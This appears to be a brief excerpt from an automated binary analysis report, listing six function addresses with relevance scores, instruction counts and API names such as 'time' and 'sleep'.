Function 00B282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00B56C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00B56F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00B36AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Function 053C02CB Relevance: .1, Instructions: 76
COMMON

Function 053C02CD Relevance: .1, Instructions: 75
COMMON